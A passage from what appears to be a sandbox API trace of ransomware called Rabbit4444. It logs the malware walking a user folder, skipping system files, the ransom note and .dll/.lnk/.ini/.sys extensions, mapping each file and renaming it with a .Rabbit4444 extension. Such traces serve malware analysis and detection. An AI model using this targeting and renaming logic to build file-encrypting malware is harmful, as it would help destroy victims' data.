lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{07E7709A-2252-4F64-93C1-4DBAB210817B}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{07e7709a-2252-4f64-93c1-4dbab210817b}.rabbit4444"), dwFlags=0x1) returned 1 [0067.705] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3806791c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3806791c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3fb43ddf, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{095069DB-9C71-4A14-B8D7-97E8B3310415}", cAlternateFileName="{09506~1")) returned 1 [0067.705] lstrcmpiW (lpString1="{095069DB-9C71-4A14-B8D7-97E8B3310415}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.705] lstrcmpiW (lpString1="{095069DB-9C71-4A14-B8D7-97E8B3310415}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.705] lstrcmpiW (lpString1="{095069DB-9C71-4A14-B8D7-97E8B3310415}", lpString2="Rabbit4444.exe") returned -1 [0067.705] lstrcmpiW (lpString1="{095069DB-9C71-4A14-B8D7-97E8B3310415}", lpString2=".") returned 1 [0067.705] lstrcmpiW (lpString1="{095069DB-9C71-4A14-B8D7-97E8B3310415}", lpString2="..") returned 1 [0067.705] lstrcmpiW (lpString1="{095069DB-9C71-4A14-B8D7-97E8B3310415}", lpString2="windows") returned -1 [0067.705] lstrcmpiW (lpString1="{095069DB-9C71-4A14-B8D7-97E8B3310415}", lpString2="bootmgr") returned -1 [0067.705] lstrcmpiW (lpString1="{095069DB-9C71-4A14-B8D7-97E8B3310415}", lpString2="pagefile.sys") returned -1 [0067.705] lstrcmpiW (lpString1="{095069DB-9C71-4A14-B8D7-97E8B3310415}", lpString2="boot") returned -1 [0067.705] lstrcmpiW (lpString1="{095069DB-9C71-4A14-B8D7-97E8B3310415}", lpString2="ids.txt") returned -1 [0067.705] lstrcmpiW (lpString1="{095069DB-9C71-4A14-B8D7-97E8B3310415}", lpString2="NTUSER.DAT") returned -1 [0067.705] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{095069DB-9C71-4A14-B8D7-97E8B3310415}" | out: lpString1="{095069DB-9C71-4A14-B8D7-97E8B3310415}") returned="{095069DB-9C71-4A14-B8D7-97E8B3310415}" [0067.705] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{095069DB-9C71-4A14-B8D7-97E8B3310415}", dwFileAttributes=0x0) returned 1 [0067.707] lstrlenW (lpString="{095069DB-9C71-4A14-B8D7-97E8B3310415}") returned 38 [0067.707] lstrlenW (lpString="Rabbit4444") returned 10 [0067.707] lstrcmpiW (lpString1="8B3310415}", lpString2="Rabbit4444") returned -1 [0067.707] lstrlenW (lpString=".dll") returned 4 [0067.707] lstrcmpiW (lpString1="415}", lpString2=".dll") returned 1 [0067.707] lstrlenW (lpString=".lnk") returned 4 [0067.707] lstrcmpiW (lpString1="415}", lpString2=".lnk") returned 1 [0067.707] lstrlenW (lpString=".ini") returned 4 [0067.707] lstrcmpiW (lpString1="415}", lpString2=".ini") returned 1 [0067.707] lstrlenW (lpString=".sys") returned 4 [0067.707] lstrcmpiW (lpString1="415}", lpString2=".sys") returned 1 [0067.707] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{095069DB-9C71-4A14-B8D7-97E8B3310415}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{095069db-9c71-4a14-b8d7-97e8b3310415}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.707] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.707] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15901812149) returned 1 [0067.707] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.707] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0067.708] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0067.708] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.708] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.709] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.709] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0067.709] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.709] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0067.709] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0067.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0067.710] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15902061063) returned 1 [0067.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0067.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0067.710] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.710] CloseHandle (hObject=0x29c) returned 1 [0067.710] CloseHandle (hObject=0x280) returned 1 [0067.710] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{095069DB-9C71-4A14-B8D7-97E8B3310415}.Rabbit4444") returned 156 [0067.710] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{095069DB-9C71-4A14-B8D7-97E8B3310415}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{095069db-9c71-4a14-b8d7-97e8b3310415}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{095069DB-9C71-4A14-B8D7-97E8B3310415}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{095069db-9c71-4a14-b8d7-97e8b3310415}.rabbit4444"), dwFlags=0x1) returned 1 [0067.711] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb50cb229, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb50cb229, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x3fb43ddf, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{0B9E8261-988B-4055-82FD-728741FA7859}", cAlternateFileName="{0B9E8~1")) returned 1 [0067.711] lstrcmpiW (lpString1="{0B9E8261-988B-4055-82FD-728741FA7859}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.711] lstrcmpiW (lpString1="{0B9E8261-988B-4055-82FD-728741FA7859}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.711] lstrcmpiW (lpString1="{0B9E8261-988B-4055-82FD-728741FA7859}", lpString2="Rabbit4444.exe") returned -1 [0067.711] lstrcmpiW (lpString1="{0B9E8261-988B-4055-82FD-728741FA7859}", lpString2=".") returned 1 [0067.711] lstrcmpiW (lpString1="{0B9E8261-988B-4055-82FD-728741FA7859}", lpString2="..") returned 1 [0067.711] lstrcmpiW (lpString1="{0B9E8261-988B-4055-82FD-728741FA7859}", lpString2="windows") returned -1 [0067.711] lstrcmpiW (lpString1="{0B9E8261-988B-4055-82FD-728741FA7859}", lpString2="bootmgr") returned -1 [0067.711] lstrcmpiW (lpString1="{0B9E8261-988B-4055-82FD-728741FA7859}", lpString2="pagefile.sys") returned -1 [0067.711] lstrcmpiW (lpString1="{0B9E8261-988B-4055-82FD-728741FA7859}", lpString2="boot") returned -1 [0067.711] lstrcmpiW (lpString1="{0B9E8261-988B-4055-82FD-728741FA7859}", lpString2="ids.txt") returned -1 [0067.711] lstrcmpiW (lpString1="{0B9E8261-988B-4055-82FD-728741FA7859}", lpString2="NTUSER.DAT") returned -1 [0067.711] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{0B9E8261-988B-4055-82FD-728741FA7859}" | out: lpString1="{0B9E8261-988B-4055-82FD-728741FA7859}") returned="{0B9E8261-988B-4055-82FD-728741FA7859}" [0067.711] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{0B9E8261-988B-4055-82FD-728741FA7859}", dwFileAttributes=0x0) returned 1 [0067.712] lstrlenW (lpString="{0B9E8261-988B-4055-82FD-728741FA7859}") returned 38 [0067.712] lstrlenW (lpString="Rabbit4444") returned 10 [0067.712] lstrcmpiW (lpString1="741FA7859}", lpString2="Rabbit4444") returned -1 [0067.712] lstrlenW (lpString=".dll") returned 4 [0067.712] lstrcmpiW (lpString1="859}", lpString2=".dll") returned 1 [0067.712] lstrlenW (lpString=".lnk") returned 4 [0067.712] lstrcmpiW (lpString1="859}", lpString2=".lnk") returned 1 [0067.712] lstrlenW (lpString=".ini") returned 4 [0067.712] lstrcmpiW (lpString1="859}", lpString2=".ini") returned 1 [0067.712] lstrlenW (lpString=".sys") returned 4 [0067.712] lstrcmpiW (lpString1="859}", lpString2=".sys") returned 1 [0067.712] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{0B9E8261-988B-4055-82FD-728741FA7859}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{0b9e8261-988b-4055-82fd-728741fa7859}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.712] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.712] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15902321551) returned 1 [0067.713] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.713] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0067.713] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0067.713] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.714] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.715] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.715] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0067.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.715] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0067.715] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0067.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0067.715] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15902594400) returned 1 [0067.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0067.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0067.715] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.715] CloseHandle (hObject=0x29c) returned 1 [0067.715] CloseHandle (hObject=0x280) returned 1 [0067.716] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{0B9E8261-988B-4055-82FD-728741FA7859}.Rabbit4444") returned 156 [0067.716] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{0B9E8261-988B-4055-82FD-728741FA7859}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{0b9e8261-988b-4055-82fd-728741fa7859}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{0B9E8261-988B-4055-82FD-728741FA7859}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{0b9e8261-988b-4055-82fd-728741fa7859}.rabbit4444"), dwFlags=0x1) returned 1 [0067.716] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9893f8b9, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9893f8b9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x3fb43ddf, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{105794B2-E9C9-44C8-ACF6-B7C0B365698C}", cAlternateFileName="{10579~1")) returned 1 [0067.716] lstrcmpiW (lpString1="{105794B2-E9C9-44C8-ACF6-B7C0B365698C}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.716] lstrcmpiW (lpString1="{105794B2-E9C9-44C8-ACF6-B7C0B365698C}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.716] lstrcmpiW (lpString1="{105794B2-E9C9-44C8-ACF6-B7C0B365698C}", lpString2="Rabbit4444.exe") returned -1 [0067.716] lstrcmpiW (lpString1="{105794B2-E9C9-44C8-ACF6-B7C0B365698C}", lpString2=".") returned 1 [0067.716] lstrcmpiW (lpString1="{105794B2-E9C9-44C8-ACF6-B7C0B365698C}", lpString2="..") returned 1 [0067.716] lstrcmpiW (lpString1="{105794B2-E9C9-44C8-ACF6-B7C0B365698C}", lpString2="windows") returned -1 [0067.717] lstrcmpiW (lpString1="{105794B2-E9C9-44C8-ACF6-B7C0B365698C}", lpString2="bootmgr") returned -1 [0067.717] lstrcmpiW (lpString1="{105794B2-E9C9-44C8-ACF6-B7C0B365698C}", lpString2="pagefile.sys") returned -1 [0067.717] lstrcmpiW (lpString1="{105794B2-E9C9-44C8-ACF6-B7C0B365698C}", lpString2="boot") returned -1 [0067.717] lstrcmpiW (lpString1="{105794B2-E9C9-44C8-ACF6-B7C0B365698C}", lpString2="ids.txt") returned -1 [0067.717] lstrcmpiW (lpString1="{105794B2-E9C9-44C8-ACF6-B7C0B365698C}", lpString2="NTUSER.DAT") returned -1 [0067.717] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{105794B2-E9C9-44C8-ACF6-B7C0B365698C}" | out: lpString1="{105794B2-E9C9-44C8-ACF6-B7C0B365698C}") returned="{105794B2-E9C9-44C8-ACF6-B7C0B365698C}" [0067.717] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{105794B2-E9C9-44C8-ACF6-B7C0B365698C}", dwFileAttributes=0x0) returned 1 [0067.717] lstrlenW (lpString="{105794B2-E9C9-44C8-ACF6-B7C0B365698C}") returned 38 [0067.717] lstrlenW (lpString="Rabbit4444") returned 10 [0067.718] lstrcmpiW (lpString1="0B365698C}", lpString2="Rabbit4444") returned -1 [0067.718] lstrlenW (lpString=".dll") returned 4 [0067.718] lstrcmpiW (lpString1="98C}", lpString2=".dll") returned 1 [0067.718] lstrlenW (lpString=".lnk") returned 4 [0067.718] lstrcmpiW (lpString1="98C}", lpString2=".lnk") returned 1 [0067.718] lstrlenW (lpString=".ini") returned 4 [0067.718] lstrcmpiW (lpString1="98C}", lpString2=".ini") returned 1 [0067.718] lstrlenW (lpString=".sys") returned 4 [0067.718] lstrcmpiW (lpString1="98C}", lpString2=".sys") returned 1 [0067.718] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{105794B2-E9C9-44C8-ACF6-B7C0B365698C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{105794b2-e9c9-44c8-acf6-b7c0b365698c}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.718] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.718] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15902889508) returned 1 [0067.718] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.718] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0067.718] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0067.718] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.719] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.720] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.720] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0067.720] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.720] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0067.720] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.721] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0067.721] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.721] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0067.721] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15903146315) returned 1 [0067.721] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0067.721] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0067.721] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.721] CloseHandle (hObject=0x29c) returned 1 [0067.721] CloseHandle (hObject=0x280) returned 1 [0067.721] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{105794B2-E9C9-44C8-ACF6-B7C0B365698C}.Rabbit4444") returned 156 [0067.721] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{105794B2-E9C9-44C8-ACF6-B7C0B365698C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{105794b2-e9c9-44c8-acf6-b7c0b365698c}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{105794B2-E9C9-44C8-ACF6-B7C0B365698C}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{105794b2-e9c9-44c8-acf6-b7c0b365698c}.rabbit4444"), dwFlags=0x1) returned 1 [0067.722] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b6d8969, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9b6d8969, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x403c199b, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{1266D82E-09AF-4573-B530-14687B493988}", cAlternateFileName="{1266D~1")) returned 1 [0067.722] lstrcmpiW (lpString1="{1266D82E-09AF-4573-B530-14687B493988}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.722] lstrcmpiW (lpString1="{1266D82E-09AF-4573-B530-14687B493988}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.722] lstrcmpiW (lpString1="{1266D82E-09AF-4573-B530-14687B493988}", lpString2="Rabbit4444.exe") returned -1 [0067.722] lstrcmpiW (lpString1="{1266D82E-09AF-4573-B530-14687B493988}", lpString2=".") returned 1 [0067.722] lstrcmpiW (lpString1="{1266D82E-09AF-4573-B530-14687B493988}", lpString2="..") returned 1 [0067.722] lstrcmpiW (lpString1="{1266D82E-09AF-4573-B530-14687B493988}", lpString2="windows") returned -1 [0067.722] lstrcmpiW (lpString1="{1266D82E-09AF-4573-B530-14687B493988}", lpString2="bootmgr") returned -1 [0067.722] lstrcmpiW (lpString1="{1266D82E-09AF-4573-B530-14687B493988}", lpString2="pagefile.sys") returned -1 [0067.722] lstrcmpiW (lpString1="{1266D82E-09AF-4573-B530-14687B493988}", lpString2="boot") returned -1 [0067.722] lstrcmpiW (lpString1="{1266D82E-09AF-4573-B530-14687B493988}", lpString2="ids.txt") returned -1 [0067.722] lstrcmpiW (lpString1="{1266D82E-09AF-4573-B530-14687B493988}", lpString2="NTUSER.DAT") returned -1 [0067.722] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{1266D82E-09AF-4573-B530-14687B493988}" | out: lpString1="{1266D82E-09AF-4573-B530-14687B493988}") returned="{1266D82E-09AF-4573-B530-14687B493988}" [0067.722] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{1266D82E-09AF-4573-B530-14687B493988}", dwFileAttributes=0x0) returned 1 [0067.724] lstrlenW (lpString="{1266D82E-09AF-4573-B530-14687B493988}") returned 38 [0067.724] lstrlenW (lpString="Rabbit4444") returned 10 [0067.724] lstrcmpiW (lpString1="87B493988}", lpString2="Rabbit4444") returned -1 [0067.724] lstrlenW (lpString=".dll") returned 4 [0067.724] lstrcmpiW (lpString1="988}", lpString2=".dll") returned 1 [0067.724] lstrlenW (lpString=".lnk") returned 4 [0067.724] lstrcmpiW (lpString1="988}", lpString2=".lnk") returned 1 [0067.724] lstrlenW (lpString=".ini") returned 4 [0067.724] lstrcmpiW (lpString1="988}", lpString2=".ini") returned 1 [0067.724] lstrlenW (lpString=".sys") returned 4 [0067.724] lstrcmpiW (lpString1="988}", lpString2=".sys") returned 1 [0067.724] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{1266D82E-09AF-4573-B530-14687B493988}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{1266d82e-09af-4573-b530-14687b493988}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.724] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.724] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15903500768) returned 1 [0067.724] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.724] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0067.724] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0067.724] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.725] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.727] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.727] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0067.727] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.727] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0067.727] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.727] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0067.727] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.727] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 